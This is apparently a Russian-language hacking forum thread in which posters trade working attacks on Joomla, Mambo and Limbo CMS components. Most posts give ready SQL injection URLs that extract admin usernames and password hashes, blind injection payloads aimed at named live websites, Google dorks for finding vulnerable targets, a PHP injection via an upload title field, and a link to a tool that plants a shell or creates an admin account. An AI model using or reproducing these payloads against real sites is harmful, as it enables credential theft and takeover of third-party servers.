|
дополнение к com_remository
активнаяя xss если можно оставлять коментариии к файлам xttp://localhost/index.php?option=com_remository&Itemid=30&func=fil einfo&id=4 и при загрузке файла иногда работает пхп инекция в "Заголовок:" пишем ";phpinfo();//" <input class='inputbox' type='text' id='filetitle' name='filetitle' size='25' value='' /> |
|
позавчера нашёл вроде в паблике нету
компонент com_joomradio google->inurl:com_joomradio inurl : option всего 452 маловато http://poosk.fm/index2.php?option=com_joomradio&page=show_radio&id =4+and+1=0+union+select+1,concat(username,0x3a,pas sword),3,4,5,6,7+from+jos_users+where+gid=25+or+gi d=24/* |
milw0rmv: Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln
В догонку хочется сказать, что на Mambo перфикc mos_, на Joomla jos_ Mambo: Код:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+mos_users--Код:
index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11+from+jos_users--Код:
Google : "option=com_rsgallery" или inurl:"index.php?option=com_rsgallery" |
очень часто в жомле встречается xss но есть проблема сесия жывёт 30 минут поэтому написал активный снифер сначала снифер пытается залить шелл если не получится залить шелл создаётся новый админ
http://slil.ru/25290482 тестил на Joomla 1.0.12 |
LIMBO CMS (Lite mambo)
Blind sql-inj сплоент:http://site/index.php?option=polls&Itemid=0&pollid=[id]/**/and/**/[подзапрос] где [id] - реально существующий id голосования, [подзапрос] - логическое выражение на данный момент уязвимы сайты тех. поддержки: Код:
http://limbo-cms.com.ru/index.php?option=polls&Itemid=0&pollid=177/**/and/**/user()=0x746172656C6B615F61646D696E406C6F63616C686F7374Код:
http://www.limboportal.com/index.php?option=polls&Itemid=0&pollid=26/**/and/**/1=1Код:
http://www.xtreme.kz/index.php?option=polls&Itemid=0&pollid=26/**/and/**/substring((SELECT/**/1/**/from/**/%23__users),1,1)=1Blind sql-inj сплоент:http://site/index2.php?option=com_magazine&func=show_magazine& id=[id]+and+[подзапрос] где [id] - реально существующий id страницы, [подзапрос] - логическое выражение на данный момент уязвимы сайты производителя: Код:
http://www.ijoomla.com/index2.php?option=com_magazine&func=show_magazine&id=7+and+substring((select+username+from+jos_users+limit+1,1),1,1)=0x21&Itemid=91З.Ы. Нашел сам, так что если вдруг боян, сильно не пинайте, это просто означает, что у вас больше информации чем у меня |
с префексом можно не париться, может кто смотрел исходники тот может и заметил что префик обозначается "#__" потом строка передаётся функции setQuery кторая и заменяет "#__" на нужный, выглядеть будет так %23__users
|
Цитата:
|
работает в том случае если производители сторонних компонентов используют стандартные функции жомлы для общения с базой данных бывают и исключения, но в 90% работает
|
Joomla Component PU Arcade Remote SQL Injection Exploit
//Exploit
Код:
http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--Код:
inurl:index.php?option=com_puarcade |
| Время: 10:31 |